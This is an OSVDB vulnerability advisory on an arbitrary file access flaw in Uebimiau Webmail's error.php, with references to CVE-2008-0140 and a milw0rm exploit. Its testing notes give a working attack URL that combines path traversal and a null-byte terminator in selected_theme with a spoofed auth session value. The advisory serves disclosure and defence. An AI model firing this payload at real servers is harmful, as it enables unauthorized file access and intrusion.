Uebimiau Webmail error.php selected_theme Variable Arbitrary File Access

2008-01-06T00:00:00
ID OSVDB:40201
Type osvdb
Reporter OSVDB
Modified 2008-01-06T00:00:00

Description

Manual Testing Notes

http://[target]/uebimiau/error.php?f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00

References:

Mail List Post: http://www.attrition.org/pipermail/vim/2008-January/001867.html Generic Exploit URL: http://www.milw0rm.com/exploits/4846 CVE-2008-0140 Bugtraq ID: 27154